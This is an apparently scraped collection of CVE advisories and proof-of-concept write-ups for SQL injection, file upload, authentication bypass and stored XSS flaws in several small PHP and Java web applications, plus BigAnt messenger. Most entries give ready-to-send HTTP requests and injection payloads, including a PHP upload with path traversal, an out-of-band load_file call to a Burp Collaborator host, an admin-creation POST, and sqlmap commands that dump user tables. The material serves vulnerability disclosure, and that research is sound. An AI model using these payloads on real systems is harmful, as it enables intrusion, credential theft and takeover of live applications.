Online Banking System in PHP v1 was discovered to contain multiple SQL injection vulnerabilities at /staff_login.php via the Staff ID and Staff Password parameters.

Permalink

Cannot retrieve contributors at this time

**Online Banking System SQL Injection**

*   `Description` => sql injection at `staff_login.php`

**Step to Reproduct**

*   `Staff Login` -> `Staff ID` \-> `Staff Password` -> `Login` -> `modify data` -> `Sqlmap`

**Exploit**

python3 sqlmap.py -r sqli.txt --batch --current-user

![image](https://user-images.githubusercontent.com/79050415/159328722-52415c05-ed4a-405b-ae9f-919692f58601.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159329104-f6734379-6e0f-4344-a7a9-d4baa41d2e34.png)

*   No filter `Staff ID` and `Staff Password` when inserting data to database

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159337062-c4045649-7665-4691-9a51-3d41d502d14e.png)

`Injection Point`

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

*   `Request`

POST /Online-Banking/staff\_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff\_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff\_id=\*&password=hhhhhhhhhh&staff\_login-btn=LOGIN

CVE-2022-27991: CVEs/POC.md at main · D4rkP0w4r/CVEs

Car Rental System v1.0 was discovered to contain a SQL injection vulnerability at /Car_Rental/booking.php via the id parameter.

Permalink

Cannot retrieve contributors at this time

**Car Rental System SQL Injection**

*   `Note` => Login to customer
*   `Injection Point` => `http://192.168.1.101:8080/Car_Rental/booking.php?id=1`

**Exploit**

*   Exploit with `Sqlmap` + `Burp Suite` ![image](https://user-images.githubusercontent.com/79050415/159719099-d87a540c-b90f-49ca-8377-36bd97a4314e.png)
*   Use `Burp Suite` capture request
*   Then save as `sqlicar.txt`

GET /Car\_Rental/booking.php?id=1 HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Car\_Rental/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ci\_session=jo7rsp3d4su5223o11544otrc44odm2l; PHPSESSID=5cddkjjvh5nhvqh96t306gau8b
Connection: close

*   Exploit with `Sqlmap`

 python3 sqlmap.py -r sqlicar.txt --current-db

![image](https://user-images.githubusercontent.com/79050415/159721152-f8a48ce3-3cde-4743-bb4a-babb858e9e48.png)

python3 sqlmap.py \-r sqlicar.txt \-D carrentalp \-\-tables

![image](https://user-images.githubusercontent.com/79050415/159719187-a0e7785b-ddf4-4581-a7ca-75e3343f4b49.png)

**Information Disclosure**

![image](https://user-images.githubusercontent.com/79050415/159721411-55b6bdde-6ad6-4490-ac0e-a96e1a7bd1f7.png) ![image](https://user-images.githubusercontent.com/79050415/159721455-10c52b03-bc77-4aaf-8de1-684a30af17b7.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/159724951-39b8fd8b-9a6d-4797-846e-ca69b7767a8e.png)

*   No filter `id` when inserting data to database

CVE-2022-28000: CVEs/POC.md at main · D4rkP0w4r/CVEs

Movie Seat Reservation v1 was discovered to contain a SQL injection vulnerability at /index.php?page=reserve via the id parameter.

Permalink

Cannot retrieve contributors at this time

**Movie Seat Reservation System Sql Injection**

*   `Note` => exploit don't need login account

**Exploit**

*   Use Burp Suite capture request with payload ![image](https://user-images.githubusercontent.com/79050415/160153517-9ff10b72-e677-428d-b92b-9588f9e0bda7.png)

GET /Movie\_Seat\_Reservation\_System/index.php?page\=reserve&id\=(select%20load\_file('%5c%5c%5c%5coumvuo0qifuf18d8xd3vrtn81z7svqjhl5cs3gs.burpcollaborator.net%5c%5cbxr')) HTTP/1.1
Host: 192.168.1.101:8080
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Upgrade\-Insecure\-Requests: 1
Accept\-Encoding: gzip, deflate
Accept\-Language: en\-US,en\-GB;q\=0.9,en;q\=0.8
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Cache\-Control: max\-age\=0

Then save as `moviesqli.txt`

*   Exploit with `Sqlmap`

python3 sqlmap.py \-r moviesqli.txt \-\-current\-user

![image](https://user-images.githubusercontent.com/79050415/160154272-be4be6b5-64a1-495c-937e-65f50c2de43d.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-dbs

![image](https://user-images.githubusercontent.com/79050415/160154484-41d6fc43-fd58-4180-9b60-440a554befc4.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-tables \-D theater\_db

![image](https://user-images.githubusercontent.com/79050415/160154696-86ce3ceb-c2f3-4d58-b095-afd061e89ad3.png)

python3 sqlmap.py \-r moviesqli.txt  \-\-batch \-columns \-D theater\_db \-T users \-dump

![image](https://user-images.githubusercontent.com/79050415/160154865-82a9b67a-e37d-4cb1-aad2-76df5a18c5f5.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/160155334-4b64f616-2719-4e99-a8e0-dcbec0d42ea1.png)

*   No filter `id` when inserting data to database

CVE-2022-28001: CVEs/POC.md at main · D4rkP0w4r/CVEs

An Access Control vulnerability exists in BigAntSoft BigAnt office messenger 5.6 via im_webserver, which could let a malicious user upload PHP Trojan files.

Permalink

Cannot retrieve contributors at this time

Vulnerability Unauthorized arbitrary file upload (SYSTEM)

https://github.com/Flash1201/bug/blob/main/Vulnerability%20Unauthorized%20arbitrary%20file%20upload%20(SYSTEM).pdf

POST /index.php/Pan/Upload/upload/clientid/4.html?flag=input HTTP/1.1

Host: 192.168.5.25:8000

Content-Length: 1268

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwEAN6czvjjYmBQL

Accept: \*/\*

Origin: http://192.168.5.25:8000

Referer: http://192.168.5.25:8000/index.php/Pan/Index/doc/root\_id/BD8455CA-FA46-33C4-BB7C-58D6F580B82F/clientid/4.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="file"; filename="4.php"

Content-Type: image/jpeg

<?php phpinfo();?>

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="root\_id"

../../../

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder\_id"

0

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder\_path\_id"

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder\_path\_name"

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="dir\_path"

\[""\]

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="user\_id"

4

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="user\_name"

Super Admin

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="saas\_id"

355DF852-7D5B-A37A-6D2D-1FD22DED7A57

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="saas\_dbname"

antdbms\_default

\------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="clientid"

4

\------WebKitFormBoundaryuwEAN6czvjjYmBQL--

https://github.com/Flash1201/bug/blob/main/2021-11-02\_16-56-09.gif

CVE-2021-43430: bug/bigant at main · Flash1201/bug

Queue poisoning attacks allegedly put accounts at risk of takeover

Apple paid out $36,000 bug bounty for HTTP request smuggling flaws on core web apps – research

A vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed.

CVSS Meta Temp Score

CVSS is a standardized scoring system to determine possibilities of attacks. The Temp Score considers temporal factors like disclosure, exploit and countermeasures. The unique Meta Score calculates the average score of different sources to provide a normalized scoring system.

Current Exploit Price (≈)

Our analysts are monitoring exploit markets and are in contact with vulnerability brokers. The range indicates the observed or calculated exploit price to be seen on exploit markets. A good indicator to understand the monetary effort required for and the popularity of an attack.

CTI Interest Score

Our Cyber Threat Intelligence team is monitoring different web sites, mailing lists, exploit markets and social media networks. The CTI Interest Score identifies the interest of attackers and the security community for this specific vulnerability in real-time. A high score indicates an elevated risk to be targeted for this vulnerability.

6.6

$0-$5k

2.89

A vulnerability was found in SAP Information System 1.0. It has been rated as critical. Affected by this issue is an unknown code of the file _/SAP\_Information\_System/controllers/add\_admin.php_ of the component _POST Request Handler_. The manipulation with an unknown input leads to a weak authentication vulnerability. Using CWE to declare the problem leads to CWE-287. Impacted is confidentiality, integrity, and availability.

The weakness was published 04/06/2022. This vulnerability is handled as CVE-2022-1248. The exploitation is known to be easy. The attack may be launched remotely. No form of authentication is required for exploitation. Technical details as well as a exploit are known.

It is declared as proof-of-concept. The exploit is available at vuldb.com. The code used by the exploit is:

POST /SAP\_Information\_System/controllers/add\_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP\_Information\_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"

hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"

P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"

admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

**Productinfoedit**

**Name**

*   SAP Information System

**CPE 2.3infoedit**

*   🔒

**CPE 2.2infoedit**

*   🔒

**CVSSv3infoedit**

VulDB Meta Base Score: 7.3  
VulDB Meta Temp Score: 6.6

VulDB Base Score: 7.3  
VulDB Temp Score: 6.6  
VulDB Vector: 🔒  
VulDB Reliability: 🔍

**CVSSv2infoedit**

AV

AC

Au

C

I

A

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

🔍

Vector

Complexity

Authentication

Confidentiality

Integrity

Availability

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

unlock

VulDB Base Score: 🔒  
VulDB Temp Score: 🔒  
VulDB Reliability: 🔍

**Exploitinginfoedit**

Class: Weak authentication  
CWE: CWE-287  
ATT&CK: Unknown

Local: No  
Remote: Yes

Availability: 🔒  
Status: Proof-of-Concept  
Download: 🔒  
Price Prediction: 🔍  
Current Price Estimation: 🔒

0-Day

unlock

unlock

unlock

unlock

Today

unlock

unlock

unlock

unlock

**Threat Intelligenceinfoedit**

Interest: 🔍  
Active Actors: 🔍  
Active APT Groups: 🔍

**Countermeasuresinfoedit**

Recommended: no mitigation known  
Status: 🔍

0-Day Time: 🔒

**Timelineinfoedit**

04/06/2022 Advisory disclosed  
04/06/2022 +0 days VulDB entry created  
04/06/2022 +0 days VulDB last update

**Sourcesinfoedit**

Status: Not defined

CVE: CVE-2022-1248 (🔒)  
scip Labs: https://www.scip.ch/en/?labs.20161013

**Entryinfoedit**

Created: 04/06/2022 05:01  
Updated: 04/06/2022 05:10  
Changes: (1) exploit\_sourcecode  
Complete: 🔍  
Submitter: mrempy

**Want to stay up to date on a daily basis?**

Enable the mail alert feature now!

CVE-2022-1248: SAP Information System POST Request add_admin.php improper authentication

Mingsoft MCMS v5.2.7 was discovered to contain a SQL injection vulnerability via /cms/content/list.

**一、 cms简介**

Mingsoft MCMS是基于SpringBoot 2架构，前端基于vue、element ui。每月28定期更新版本，为开发者提供上百套免费模板,同时提供适用的插件（文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等...），一套简单好用的开源系统、一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效率，提供全方位的企业级开发解决方案

**二、 漏洞简介**

Mingsoft MCMS v5.2.7版本存在SQL注入，该漏洞位于路由/cms/content/list，参数categoryId存在SQL注入，缺少对于SQL数据的过滤和转义

**三、 影响范围**

Mingsoft MCMS <=5.2.7  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002432_d85d9547_2159388.png "屏幕截图.png")

**四、 漏洞分析**

位于net/mingsoft/cms/action/ContentAction.java，找到有一处路由\*\*/cms/content/list\*\*代码如下，对第128行IContentBiz.query()进行分析  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002519_0609d5fb_2159388.png "屏幕截图.png")  
我们先看一下IContentBiz接口，IContentBiz接口继承了IBaseBiz接口，那么子类扩展父类之后就可以获得父类IBaseBiz的属性和方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002543_33cd0ce0_2159388.png "屏幕截图.png")  
接着，我们知道IBaseBiz是一个接口定义了query方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002609_d8960395_2159388.png "屏幕截图.png")  
BaseBizImpl实现类实现了IBaseBiz接口，我们知道一个类实现了一个或多个接口之后，这个类必须完全实现这些接口里所定义的全部抽象方法（也就是重写这些抽象方法），实现接口与继承父类相似，一样可以获得所实现接口里定义的常量和方法，可以看到IBaseBiz已经重写了query方法  
![](https://images.gitee.com/uploads/images/2022/0303/002636_f2aede33_2159388.png "屏幕截图.png")  
BaseBizImpl实现类中重写了父类的query方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002727_b1830bdf_2159388.png "屏幕截图.png")  
我们知道IContentDao.java,IContentDaoimpl.java和McmsAction.java，分别对应映射的对象，对象的实现类和前端控制器，位于net/mingsoft/cms/dao/IContentDao.java中，IContentDao接口继承了IBaseDao接口，那么IContentDao接口就获得了IBaseDao接口的所有方法  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/002753_59f834ae_2159388.png "屏幕截图.png")  
从上图可以看到映射文件中的namespace="net.mingsoft.cms.dao.IContentDao"所绑定的是IContentDao接口，即面向接口编程，mybatis中，  
当你的namespace绑定接口后，可以不用写接口实现类，mybatis会通过该绑定自动帮你找到对应要执行的SQL语句，我们知道接口中的方法与映射文件中的SQL语句的ID一一对应，所以我们直接查找IContentDao.xml中SQL语句的id为query，下图可以看到成功定位到第212行。  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/014728_66858f54_2159388.png "屏幕截图.png")  
分析id等于query的SQL语句，第221行  
`select id FROM cms_category where find_in_set('${categoryId}',CATEGORY_PARENT_IDS)>0`  
我们知道mybatis框架find\_in\_set后是不能用#{}，使用${}是拼接,底层调用的是Statement对象，直接将categoryId的属性值拼接进SQL语句，没有任何的过滤，参数categoryId存在SQL注入

**五、 证明**

不需要cookie凭证，直接构造poc即可利用：

    POST /cms/content/list HTTP/1.1
    Host:172.20.10.3:8081
    Connection: close
    Accept: application/json, text/plain, */*
    Origin: http://172.20.10.3:8081
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
    Referer: http://172.20.10.3:8081/ms/main.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 197
    
    categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,(SELECT MID((IFNULL(CAST(grantee AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 78,1),0x716a627a71),3762) AND 'EIVI'='EIVI
    

本地搭建环境验证，在路由/cms/content/list下,参数categoryId存在SQL注入，如下图所示通过SQL注入成功获取到用户信息root@localhost  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0303/021700_85cffd42_2159388.png "屏幕截图.png")

**六、 加固建议**

1、正确用法为使用foreach，对like、find\_in\_set、in和order语句需要使用#  
2、增加SQL filter过滤器，对危险参数进行严格校验及过滤。

CVE-2022-26585: Mingsoft MCMS v5.2.7 SQL注入 · Issue #I4W1S9 · 铭飞/MCMS - Gitee.com

A path traversal vulnerability was identified in GitHub Enterprise Server management console that allowed the bypass of CSRF protections. This could potentially lead to privilege escalation. To exploit this vulnerability, an attacker would need to target a user that was actively logged into the management console. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.5 and was fixed in versions 3.1.19, 3.2.11, 3.3.6, 3.4.1. This vulnerability was reported via the GitHub Bug Bounty program.

CVE-2022-23732: Release notes - GitHub Docs

Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /settings:save HTTP/1.1
    Host: 127.0.0.1:2580
    Connection: keep-alive
    Content-Length: 343
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YWRtaW4=
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:2580
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1:2580/settings
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    
    save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
    HTTP/1.1 302 Moved
    Location: /settings:save
    
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on <script>alert(xss.com)</script><br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h1>Server settings</h1>
    
    Saving config/rumble.conf
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43461: Offensive Security’s Exploit Database Archive

An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image component.

Tag

#apple